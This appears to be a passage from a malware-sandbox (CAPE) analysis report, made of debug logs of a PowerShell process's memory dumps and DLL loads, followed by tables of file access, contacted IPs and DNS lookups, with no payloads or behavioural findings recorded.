2026-05-28 19:27:16,276 [root] DEBUG: 15728: ScanForDisguisedPE: No PE image located in range 0x00007FFDBBA20000-0x00007FFDBBA2741D.
2026-05-28 19:27:16,277 [lib.common.results] INFO: Uploading file C:\IlgkUEVfG\CAPE\15728_168426516272328452026 to CAPE\d3a0956a360a24136b6b87e5a4b03aed466efc701f2c21d0f4f637325d3e3e3e; Size is 29725; Max size: 100000000
2026-05-28 19:27:16,280 [root] DEBUG: 15728: DumpMemory: Payload successfully created: C:\IlgkUEVfG\CAPE\15728_168426516272328452026 (size 29725 bytes)
2026-05-28 19:27:16,281 [root] DEBUG: 15728: DumpRegion: Dumped entire allocation from 0x00007FFDBBA20000, size 32768 bytes.
2026-05-28 19:27:16,281 [root] DEBUG: 15728: ProcessTrackedRegion: Dumped region at 0x00007FFDBBA20000.
2026-05-28 19:27:16,282 [root] DEBUG: 15728: YaraScan: Scanning 0x00007FFDBBA20000, size 0x741d
2026-05-28 19:27:16,284 [root] DEBUG: 15728: AllocationHandler: Memory region (size 0xa0000) reserved but not committed at 0x00007DF45B5B0000.
2026-05-28 19:27:16,284 [root] DEBUG: 15728: AllocationHandler: Previously reserved region at 0x00007DF45B5B0000, committing at: 0x00007DF45B5B0000.
2026-05-28 19:27:16,285 [root] DEBUG: 15728: AllocationHandler: Adding allocation to tracked region list: 0x00007DF45B5A0000, size: 0x10000.
2026-05-28 19:27:16,285 [root] DEBUG: 15728: GetEntropy: Error - Supplied address inaccessible: 0x00007DF45B5A0000
2026-05-28 19:27:16,286 [root] DEBUG: 15728: AllocationHandler: Processing previous tracked region at: 0x00007DF45B5B0000.
2026-05-28 19:27:16,286 [root] DEBUG: 15728: ProcessTrackedRegion: Entropy for tracked region at 0x00007DF45B5B0000: 1.752339e-01
2026-05-28 19:27:16,288 [root] DEBUG: 15728: DumpPEsInRange: Scanning range 0x00007DF45B5B0000 - 0x00007DF45B5B0066.
2026-05-28 19:27:16,289 [root] DEBUG: 15728: ScanForDisguisedPE: Size too small: 0x66 bytes
2026-05-28 19:27:16,290 [lib.common.results] INFO: Uploading file C:\IlgkUEVfG\CAPE\15728_311854416272328452026 to CAPE\9449510d8abc5b5303278fb8f672ccefb96cfa0e066b04920773b080b23f8f29; Size is 102; Max size: 100000000
2026-05-28 19:27:16,294 [root] DEBUG: 15728: DumpMemory: Payload successfully created: C:\IlgkUEVfG\CAPE\15728_311854416272328452026 (size 102 bytes)
2026-05-28 19:27:16,294 [root] DEBUG: 15728: DumpRegion: Dumped entire allocation from 0x00007DF45B5B0000, size 4096 bytes.
2026-05-28 19:27:16,295 [root] DEBUG: 15728: ProcessTrackedRegion: Dumped region at 0x00007DF45B5B0000.
2026-05-28 19:27:16,295 [root] DEBUG: 15728: YaraScan: Scanning 0x00007DF45B5B0000, size 0x66
2026-05-28 19:27:16,297 [root] DEBUG: 15728: AllocationHandler: Memory region (size 0x10000) reserved but not committed at 0x00007DF45B5A0000.
2026-05-28 19:27:16,297 [root] DEBUG: 15728: AllocationHandler: Previously reserved region at 0x00007DF45B5A0000, committing at: 0x00007DF45B5A0000.
2026-05-28 19:27:16,298 [root] DEBUG: 15728: AllocationHandler: Adding allocation to tracked region list: 0x00007FFDBB85D000, size: 0x1000.
2026-05-28 19:27:16,315 [root] DEBUG: 15728: DLL loaded at 0x00007FFE743A0000: C:\Windows\System32\bcryptprimitives (0x82000 bytes).
2026-05-28 19:27:16,327 [root] DEBUG: 15728: AllocationHandler: Adding allocation to tracked region list: 0x00000235C5262000, size: 0x1000.
2026-05-28 19:27:16,328 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBBA20000.
2026-05-28 19:27:16,350 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBBA20000.
2026-05-28 19:27:16,351 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBBA20000.
2026-05-28 19:27:16,363 [root] DEBUG: 15728: DLL loaded at 0x00007FFE73670000: C:\Windows\SYSTEM32\CRYPTSP (0x18000 bytes).
2026-05-28 19:27:16,364 [root] DEBUG: 15728: DLL loaded at 0x00007FFE72DB0000: C:\Windows\system32\rsaenh (0x34000 bytes).
2026-05-28 19:27:16,449 [root] DEBUG: 15728: AllocationHandler: Adding allocation to tracked region list: 0x00007FFDBB936000, size: 0x1000.
2026-05-28 19:27:16,577 [root] DEBUG: 15728: DLL loaded at 0x00007FFE76420000: C:\Windows\System32\clbcatq (0xa9000 bytes).
2026-05-28 19:27:16,711 [root] DEBUG: 15728: .NET JIT native cache at 0x00007FFDBBD10000: scans and dumps active.
2026-05-28 19:27:16,712 [root] DEBUG: 15728: .NET JIT native cache at 0x00007FFDBBD10000: scans and dumps active.
2026-05-28 19:27:16,713 [root] DEBUG: 15728: caller_dispatch: Added region at 0x00007FFDBBD10000 to tracked regions list (ntdll::NtAllocateVirtualMemory returns to 0x00007FFDBBD118F4, thread 16224).
2026-05-28 19:27:16,714 [root] DEBUG: 15728: ProcessTrackedRegion: .NET cache region at 0x00007FFDBBD10000 skipped
2026-05-28 19:27:16,714 [root] DEBUG: 15728: api-rate-cap: NtDelayExecution hook disabled due to rate
2026-05-28 19:27:16,799 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB850000.
2026-05-28 19:27:16,813 [root] DEBUG: 15728: AllocationHandler: Previously reserved region at 0x00007FFDBBD10000, committing at: 0x00007FFDBBD34000.
2026-05-28 19:27:16,818 [root] DEBUG: 15728: DLL loaded at 0x00007FFE765B0000: C:\Windows\System32\psapi (0x8000 bytes).
2026-05-28 19:27:16,848 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB850000.
2026-05-28 19:27:16,854 [root] DEBUG: 15728: DLL loaded at 0x00007FFE73720000: C:\Windows\SYSTEM32\Wldp (0x2d000 bytes).
2026-05-28 19:27:16,854 [root] DEBUG: 15728: DLL loaded at 0x00007FFE71E90000: C:\Windows\SYSTEM32\windows.storage (0x79b000 bytes).
2026-05-28 19:27:16,856 [root] DEBUG: 15728: DLL loaded at 0x00007FFE751C0000: C:\Windows\System32\SHCORE (0xad000 bytes).
2026-05-28 19:27:16,879 [root] DEBUG: 15728: DLL loaded at 0x00007FFE5BFD0000: C:\Windows\SYSTEM32\amsi (0x1f000 bytes).
2026-05-28 19:27:16,884 [root] DEBUG: 15728: DLL loaded at 0x00007FFE73CA0000: C:\Windows\SYSTEM32\USERENV (0x2e000 bytes).
2026-05-28 19:27:16,887 [root] DEBUG: 15728: DLL loaded at 0x00007FFE73CE0000: C:\Windows\SYSTEM32\profapi (0x25000 bytes).
2026-05-28 19:27:16,898 [root] DEBUG: 15728: DLL loaded at 0x00007FFE73F00000: C:\Windows\System32\wintrust (0x67000 bytes).
2026-05-28 19:27:16,899 [root] DEBUG: 15728: DLL loaded at 0x00007FFE738B0000: C:\Windows\SYSTEM32\MSASN1 (0x12000 bytes).
2026-05-28 19:27:16,900 [root] DEBUG: 15728: DLL loaded at 0x00007FFE5BF80000: C:\Program Files\Windows Defender\MpOav (0x44000 bytes).
2026-05-28 19:27:16,921 [root] DEBUG: 15728: DLL loaded at 0x00007FFE72640000: C:\Windows\SYSTEM32\gpapi (0x23000 bytes).
2026-05-28 19:27:16,944 [root] DEBUG: 15728: .NET JIT native cache at 0x00007FFDBBEC0000: scans and dumps active.
2026-05-28 19:27:16,945 [root] DEBUG: 15728: .NET JIT native cache at 0x00007FFDBBEC0000: scans and dumps active.
2026-05-28 19:27:16,952 [root] DEBUG: 15728: caller_dispatch: Added region at 0x00007FFDBBEC0000 to tracked regions list (ntdll::NtAllocateVirtualMemory returns to 0x00007FFDBBEC2AA1, thread 15732).
2026-05-28 19:27:16,952 [root] DEBUG: 15728: ProcessTrackedRegion: .NET cache region at 0x00007FFDBBEC0000 skipped
2026-05-28 19:27:16,953 [root] DEBUG: 15728: AllocationHandler: Adding allocation to tracked region list: 0x00007FFDBBF40000, size: 0x1000.
2026-05-28 19:27:16,956 [root] INFO: Added new file to list with pid 15728 and path C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xok4x5go.ckm.ps1
2026-05-28 19:27:16,965 [root] INFO: Added new file to list with pid 15728 and path C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1ltyxlrx.s04.psm1
2026-05-28 19:27:16,974 [root] DEBUG: 15728: DLL loaded at 0x00007FFE6BC20000: C:\Windows\System32\MSISIP (0x15000 bytes).
2026-05-28 19:27:16,977 [root] DEBUG: 15728: DLL loaded at 0x00007FFE356C0000: C:\Windows\System32\wshext (0x1e000 bytes).
2026-05-28 19:27:16,978 [root] DEBUG: 15728: DLL loaded at 0x00007FFE18C30000: C:\Windows\SYSTEM32\OpcServices (0x21d000 bytes).
2026-05-28 19:27:16,979 [root] DEBUG: 15728: DLL loaded at 0x00007FFE19D90000: C:\Windows\System32\AppxSip (0x4c000 bytes).
2026-05-28 19:27:16,981 [root] DEBUG: 15728: DLL loaded at 0x00007FFE6BB30000: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip (0xc000 bytes).
2026-05-28 19:27:16,984 [root] DEBUG: 15728: DLL loaded at 0x00007FFE1AAE0000: C:\Windows\Microsoft.Net\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data (0x36c000 bytes).
2026-05-28 19:27:16,988 [lib.common.results] INFO: Uploading file C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xok4x5go.ckm.ps1 to files\96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7; Size is 60; Max size: 100000000
2026-05-28 19:27:16,991 [lib.common.results] INFO: Uploading file C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1ltyxlrx.s04.psm1 to files\96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7; Size is 60; Max size: 100000000
2026-05-28 19:27:16,999 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB900000.
2026-05-28 19:27:17,082 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB900000.
2026-05-28 19:27:17,110 [root] DEBUG: 15728: AllocationHandler: Previously reserved region at 0x00007FFDBBEC0000, committing at: 0x00007FFDBBEF5000.
2026-05-28 19:27:17,174 [root] DEBUG: 15728: .NET JIT native cache at 0x00007FFDBC090000: scans and dumps active.
2026-05-28 19:27:17,176 [root] DEBUG: 15728: .NET JIT native cache at 0x00007FFDBC090000: scans and dumps active.
2026-05-28 19:27:17,180 [root] DEBUG: 15728: caller_dispatch: Added region at 0x00007FFDBC090000 to tracked regions list (ntdll::NtSetInformationThread returns to 0x00007FFDBC091CA1, thread 15732).
2026-05-28 19:27:17,183 [root] DEBUG: 15728: ProcessTrackedRegion: .NET cache region at 0x00007FFDBC090000 skipped
2026-05-28 19:27:17,201 [root] DEBUG: 15728: AllocationHandler: Previously reserved region at 0x00007FFDBC090000, committing at: 0x00007FFDBC099000.
2026-05-28 19:27:17,207 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00000235C5260000.
2026-05-28 19:27:17,210 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00000235C5260000.
2026-05-28 19:27:17,211 [root] DEBUG: 15728: AllocationHandler: Adding allocation to tracked region list: 0x00000235C5590000, size: 0x32000.
2026-05-28 19:27:17,213 [root] DEBUG: 15728: GetEntropy: Error - Supplied address inaccessible: 0x00000235C5590000
2026-05-28 19:27:17,213 [root] DEBUG: 15728: AllocationHandler: Memory region (size 0x32000) reserved but not committed at 0x00000235C5590000.
2026-05-28 19:27:17,214 [root] DEBUG: 15728: AllocationHandler: Previously reserved region at 0x00000235C5590000, committing at: 0x00000235C5590000.
2026-05-28 19:27:17,243 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC090000.
2026-05-28 19:27:17,253 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC090000.
2026-05-28 19:27:17,275 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB900000.
2026-05-28 19:27:17,295 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC090000.
2026-05-28 19:27:17,298 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBBF40000.
2026-05-28 19:27:17,306 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC090000.
2026-05-28 19:27:17,310 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC090000.
2026-05-28 19:27:17,317 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC090000.
2026-05-28 19:27:17,332 [root] DEBUG: 15728: api-rate-cap: ReadProcessMemory hook disabled due to rate
2026-05-28 19:27:17,338 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC090000.
2026-05-28 19:27:17,370 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC090000.
2026-05-28 19:27:17,371 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC090000.
2026-05-28 19:27:17,406 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC090000.
2026-05-28 19:27:17,416 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC090000.
2026-05-28 19:27:17,425 [root] DEBUG: 15728: .NET JIT native cache at 0x00007FFDBC1D0000: scans and dumps active.
2026-05-28 19:27:17,426 [root] DEBUG: 15728: .NET JIT native cache at 0x00007FFDBC1D0000: scans and dumps active.
2026-05-28 19:27:17,436 [root] DEBUG: 15728: caller_dispatch: Added region at 0x00007FFDBC1D0000 to tracked regions list (ntdll::LdrGetProcedureAddressForCaller returns to 0x00007FFDBC1D40F2, thread 15732).
2026-05-28 19:27:17,437 [root] DEBUG: 15728: ProcessTrackedRegion: .NET cache region at 0x00007FFDBC1D0000 skipped
2026-05-28 19:27:17,443 [root] DEBUG: 15728: AllocationHandler: Previously reserved region at 0x00007FFDBC1D0000, committing at: 0x00007FFDBC1D7000.
2026-05-28 19:27:17,499 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB900000.
2026-05-28 19:27:17,501 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBBF40000.
2026-05-28 19:27:17,573 [root] DEBUG: 15728: .NET JIT native cache at 0x00007FFDBC2C0000: scans and dumps active.
2026-05-28 19:27:17,610 [root] DEBUG: 15728: DLL loaded at 0x00007FFE354F0000: C:\Windows\Microsoft.Net\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions (0x4f000 bytes).
2026-05-28 19:27:17,633 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB900000.
2026-05-28 19:27:17,697 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB900000.
2026-05-28 19:27:17,699 [root] DEBUG: 15728: DLL loaded at 0x00007FFE64CF0000: C:\Windows\SYSTEM32\secur32 (0xc000 bytes).
2026-05-28 19:27:17,720 [root] DEBUG: 15728: AllocationHandler: Adding allocation to tracked region list: 0x00007FFDBC380000, size: 0x1000.
2026-05-28 19:27:17,722 [root] DEBUG: 15728: .NET JIT native cache at 0x00007FFDBC380000: scans and dumps active.
2026-05-28 19:27:17,723 [root] DEBUG: 15728: ProcessTrackedRegion: .NET cache region at 0x00007FFDBC380000 skipped
2026-05-28 19:27:17,825 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB900000.
2026-05-28 19:27:17,871 [root] DEBUG: 15728: api-cap: compileMethod hook disabled due to count: 5000
2026-05-28 19:27:17,872 [root] DEBUG: 15728: api-cap: compileMethod hook disabled due to count: 5001
2026-05-28 19:27:17,894 [root] DEBUG: 15728: AllocationHandler: Adding allocation to tracked region list: 0x00007FFDBC590000, size: 0x1000.
2026-05-28 19:27:17,898 [root] DEBUG: 15728: ProcessTrackedRegion: Entropy for tracked region at 0x00007FFDBC590000: 5.126778e+00
2026-05-28 19:27:17,899 [root] DEBUG: 15728: DumpPEsInRange: Scanning range 0x00007FFDBC590000 - 0x00007FFDBC592635.
2026-05-28 19:27:17,900 [root] DEBUG: 15728: ScanForDisguisedPE: No PE image located in range 0x00007FFDBC590000-0x00007FFDBC592635.
2026-05-28 19:27:17,903 [lib.common.results] INFO: Uploading file C:\IlgkUEVfG\CAPE\15728_2143590417272328452026 to CAPE\f28a3b7c5936b70f5d461a7b88dadd42c6c55b5d67a9ab931c79064ea0d6acab; Size is 9937; Max size: 100000000
2026-05-28 19:27:17,906 [root] DEBUG: 15728: DumpMemory: Payload successfully created: C:\IlgkUEVfG\CAPE\15728_2143590417272328452026 (size 9937 bytes)
2026-05-28 19:27:17,906 [root] DEBUG: 15728: DumpRegion: Dumped entire allocation from 0x00007FFDBC590000, size 12288 bytes.
2026-05-28 19:27:17,912 [root] DEBUG: 15728: ProcessTrackedRegion: Dumped region at 0x00007FFDBC590000.
2026-05-28 19:27:17,931 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBBF40000.
2026-05-28 19:27:17,936 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB900000.
2026-05-28 19:27:17,958 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB900000.
2026-05-28 19:27:17,981 [root] DEBUG: 15728: DLL loaded at 0x00007FFE71770000: C:\Windows\system32\uxtheme (0x9e000 bytes).
2026-05-28 19:27:18,008 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB900000.
2026-05-28 19:27:18,030 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB900000.
2026-05-28 19:27:18,034 [root] DEBUG: 15728: DLL loaded at 0x00007FFE64490000: C:\Program Files\Windows Defender\MPCLIENT (0xe9000 bytes).
2026-05-28 19:27:18,138 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB900000.
2026-05-28 19:27:18,144 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB900000.
2026-05-28 19:27:18,327 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB900000.
2026-05-28 19:27:18,353 [root] DEBUG: 15728: AllocationHandler: Adding allocation to tracked region list: 0x00007FFDBC900000, size: 0x1000.
2026-05-28 19:27:18,354 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBBF40000.
2026-05-28 19:27:18,366 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC590000.
2026-05-28 19:27:18,380 [root] DEBUG: 15728: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC590000.
2026-05-28 19:27:18,392 [root] DEBUG: 15728: api-cap: NtAllocateVirtualMemory hook disabled due to count: 5000
2026-05-28 19:27:18,393 [root] DEBUG: 15728: api-cap: NtAllocateVirtualMemory hook disabled due to count: 5001
2026-05-28 19:27:18,625 [root] DEBUG: 15728: api-cap: NtFreeVirtualMemory hook disabled due to count: 5001
2026-05-28 19:27:18,626 [root] DEBUG: 15728: api-cap: NtFreeVirtualMemory hook disabled due to count: 5001
2026-05-28 19:27:18,651 [root] DEBUG: 15728: DLL loaded at 0x00007FFE73170000: C:\Windows\SYSTEM32\iphlpapi (0x3b000 bytes).
2026-05-28 19:27:18,654 [root] DEBUG: 15728: DLL loaded at 0x00007FFE731B0000: C:\Windows\SYSTEM32\DNSAPI (0xca000 bytes).
2026-05-28 19:27:18,656 [root] DEBUG: 15728: DLL loaded at 0x00007FFE752A0000: C:\Windows\System32\NSI (0x8000 bytes).
2026-05-28 19:27:18,679 [root] DEBUG: 15728: DLL loaded at 0x00007FFE6D680000: C:\Windows\SYSTEM32\dhcpcsvc6 (0x17000 bytes).
2026-05-28 19:27:18,680 [root] DEBUG: 15728: DLL loaded at 0x00007FFE6D660000: C:\Windows\SYSTEM32\dhcpcsvc (0x1d000 bytes).
2026-05-28 19:27:18,704 [root] DEBUG: 15728: DLL loaded at 0x00007FFE6DBD0000: C:\Windows\SYSTEM32\WINNSI (0xb000 bytes).
2026-05-28 19:27:18,753 [root] DEBUG: 15728: DLL loaded at 0x00007FFE19D50000: C:\Windows\SYSTEM32\rasman (0x34000 bytes).
2026-05-28 19:27:18,754 [root] DEBUG: 15728: DLL loaded at 0x00007FFE188A0000: C:\Windows\SYSTEM32\rasapi32 (0xff000 bytes).
2026-05-28 19:27:18,760 [root] DEBUG: 15728: DLL loaded at 0x00007FFE35600000: C:\Windows\SYSTEM32\rtutils (0x17000 bytes).
2026-05-28 19:27:18,773 [root] DEBUG: 15728: DLL loaded at 0x00007FFE73480000: C:\Windows\system32\mswsock (0x6a000 bytes).
2026-05-28 19:27:18,809 [root] DEBUG: 15728: DLL loaded at 0x00007FFE6ED00000: C:\Windows\SYSTEM32\winhttp (0x10a000 bytes).
2026-05-28 19:27:18,813 [root] DEBUG: 15728: DLL loaded at 0x00007FFE60A10000: C:\Windows\system32\OnDemandConnRouteHelper (0x17000 bytes).
2026-05-28 19:27:26,644 [root] INFO: Added new file to list with pid 4712 and path C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
2026-05-28 19:27:30,723 [root] DEBUG: 15728: DLL loaded at 0x00007FFE18700000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\diasymreader (0x172000 bytes).
2026-05-28 19:27:30,788 [root] INFO: Added new file to list with pid 15728 and path C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
2026-05-28 19:27:30,800 [root] DEBUG: 15728: NtTerminateProcess hook: Attempting to dump process 15728
2026-05-28 19:27:30,801 [root] DEBUG: 15728: DoProcessDump: Skipping process dump as code is identical on disk.
2026-05-28 19:27:30,805 [root] DEBUG: 15728: DumpInterestingRegions: Skipping .NET JIT native cache at 0x00007FFDBBA20000 (jit-dumps=0)
2026-05-28 19:27:30,806 [root] DEBUG: 15728: DumpInterestingRegions: Skipping .NET JIT native cache at 0x00007FFDBBD10000 (jit-dumps=0)
2026-05-28 19:27:30,807 [root] DEBUG: 15728: DumpInterestingRegions: Skipping .NET JIT native cache at 0x00007FFDBBEC0000 (jit-dumps=0)
2026-05-28 19:27:30,807 [root] DEBUG: 15728: DumpInterestingRegions: Skipping .NET JIT native cache at 0x00007FFDBC090000 (jit-dumps=0)
2026-05-28 19:27:30,808 [root] DEBUG: 15728: DumpInterestingRegions: Skipping .NET JIT native cache at 0x00007FFDBC1D0000 (jit-dumps=0)
2026-05-28 19:27:30,809 [root] DEBUG: 15728: DumpInterestingRegions: Skipping .NET JIT native cache at 0x00007FFDBC2C0000 (jit-dumps=0)
2026-05-28 19:27:30,810 [root] DEBUG: 15728: DumpInterestingRegions: Skipping .NET JIT native cache at 0x00007FFDBC380000 (jit-dumps=0)
2026-05-28 19:27:30,816 [root] DEBUG: 15728: ProcessTrackedRegion: Entropy for tracked region at 0x00007FFDBC900000: 2.650852e+00
2026-05-28 19:27:30,816 [root] DEBUG: 15728: DumpPEsInRange: Scanning range 0x00007FFDBC900000 - 0x00007FFDBC901858.
2026-05-28 19:27:30,817 [root] DEBUG: 15728: ScanForDisguisedPE: No PE image located in range 0x00007FFDBC900000-0x00007FFDBC901858.
2026-05-28 19:27:30,819 [lib.common.results] INFO: Uploading file C:\IlgkUEVfG\CAPE\15728_1439045530272328452026 to CAPE\37aca25f8d7b1ee02d27690bb64079f3949d448851bc68f28aa68413c4576af3; Size is 6232; Max size: 100000000
2026-05-28 19:27:30,823 [root] DEBUG: 15728: DumpMemory: Payload successfully created: C:\IlgkUEVfG\CAPE\15728_1439045530272328452026 (size 6232 bytes)
2026-05-28 19:27:30,823 [root] DEBUG: 15728: DumpRegion: Dumped entire allocation from 0x00007FFDBC900000, size 8192 bytes.
2026-05-28 19:27:30,824 [root] DEBUG: 15728: ProcessTrackedRegion: Dumped region at 0x00007FFDBC900000.
2026-05-28 19:27:30,831 [root] INFO: Process with pid 15728 has terminated
2026-05-28 19:27:30,860 [root] DEBUG: 12824: DLL loaded at 0x00007FFE18CD0000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\diasymreader (0x172000 bytes).
| Name | Label | Manager | Started On | Shutdown On | Route |
|---|---|---|---|---|---|
| cuckoo1 | cuckoo1 | KVM | 2026-05-28 19:25:55 | 2026-05-28 19:31:24 | none |
| Process: RuntimeBroker.exe (11316) | ||||||||
| file | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCookies | |||||||
| Process: RuntimeBroker.exe (11316) | ||||||||
| file | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCookies | |||||||
| Process: RuntimeBroker.exe (11316) | ||||||||
| file | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCookies | |||||||
| Process: RuntimeBroker.exe (11316) | ||||||||
| file | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCookies | |||||||
| Process: powershell.exe (12824) | ||||||||
| file | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCookies | |||||||
Seek in progress...
| Direct | IP | Country Name | ASN |
|---|---|---|---|
| N | 146.75.119.82 [VT] | unknown | - |
| N | 149.135.84.160 [VT] | unknown | - |
| N | 151.101.11.82 [VT] | unknown | - |
| Y | 20.190.167.66 [VT] | unknown | - |
| Y | 13.107.246.31 [VT] | unknown | - |
| Y | 23.202.165.215 [VT] | unknown | - |
| Y | 150.171.109.17 [VT] | unknown | - |
| N | 162.254.195.69 [VT] | unknown | - |
| Y | 103.10.125.22 [VT] | unknown | - |
| Y | 204.79.197.203 [VT] | unknown | - |
| Y | 150.171.28.12 [VT] | unknown | - |
| Y | 149.135.84.11 [VT] | unknown | - |
| Y | 18.155.216.46 [VT] | unknown | - |
| Y | 104.18.33.89 [VT] | unknown | - |
| Y | 149.135.84.32 [VT] | unknown | - |
| Y | 150.171.109.25 [VT] | unknown | - |
| Y | 150.171.28.10 [VT] | unknown | - |
| Y | 149.135.84.27 [VT] | unknown | - |
| Y | 162.159.135.232 [VT] | unknown | - |
| Y | 162.159.137.232 [VT] | unknown | - |
| N | 162.159.135.234 [VT] | unknown | - |
| N | 162.159.134.234 [VT] | unknown | - |
| N | 149.135.84.155 [VT] | unknown | - |
| Y | 162.159.130.235 [VT] | unknown | - |
| Y | 103.10.125.23 [VT] | unknown | - |
| N | 185.247.139.200 [VT] | unknown | - |
| N | 162.159.130.234 [VT] | unknown | - |
| Y | 162.159.133.233 [VT] | unknown | - |
| N | 23.216.106.59 [VT] | unknown | - |
| Y | 23.211.129.205 [VT] | unknown | - |
| Y | 199.232.215.52 [VT] | unknown | - |
| Y | 172.172.255.217 [VT] | unknown | - |
| Y | 23.216.117.82 [VT] | unknown | - |
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| badoomovies.com [VT] | A 185.247.139.200 [VT] | 185.247.139.200 [VT] |
| dns.google [VT] |
A 8.8.8.8
[VT]
A 8.8.4.4 [VT] |
8.8.4.4 [VT] |
| api.steampowered.com [VT] | A 23.216.106.59 [VT] | 23.216.106.59 [VT] |
| ipv6check-udp.steamserver.net [VT] |
CNAME udp.ipv6check.akadns.net
[VT]
AAAA 2404:3fc0:1:102::670a:7d35 [VT] AAAA 2404:3fc0:1:100::32 [VT] AAAA 2404:3fc0:1:102::670a:7d38 [VT] AAAA 2404:3fc0:1:100::670a:7d06 [VT] CNAME syd.udp.ipv6check.akadns.net [VT] AAAA 2404:3fc0:1:102::670a:7d37 [VT] AAAA 2404:3fc0:1:100::670a:7d08 [VT] AAAA 2404:3fc0:1:102::670a:7d36 [VT] AAAA 2404:3fc0:1:100::42 [VT] |
|
| ipv6check-http.steamserver.net [VT] |
CNAME syd.http.ipv6check.akadns.net
[VT]
CNAME http.ipv6check.akadns.net [VT] |
|
| steamconnecttest.com [VT] |
A 149.135.84.160
[VT]
A 149.135.84.155 [VT] |
23.62.157.110 [VT] |
| p2p-syd1.discovery.steamserver.net [VT] |
A 103.10.125.24
[VT]
A 103.10.125.42 [VT] |
103.10.125.42 [VT] |
| gateway-us-east1-c.discord.gg [VT] |
A 162.159.136.234
[VT]
A 162.159.130.234 [VT] A 162.159.133.234 [VT] A 162.159.134.234 [VT] A 162.159.135.234 [VT] |
162.159.133.234 [VT] |
| cmp1-lax1.steamserver.net [VT] | A 162.254.195.69 [VT] | 162.254.195.69 [VT] |
| disabled.invalid [VT] | NXDOMAIN | |
| client-update.fastly.steamstatic.com [VT] |
CNAME valve.map.fastly.net
[VT]
A 151.101.11.82 [VT] A 146.75.119.82 [VT] |
199.232.211.82 [VT] |
No results found.
No behavioral analysis data available.
No dropped files found.
No CAPE payloads found.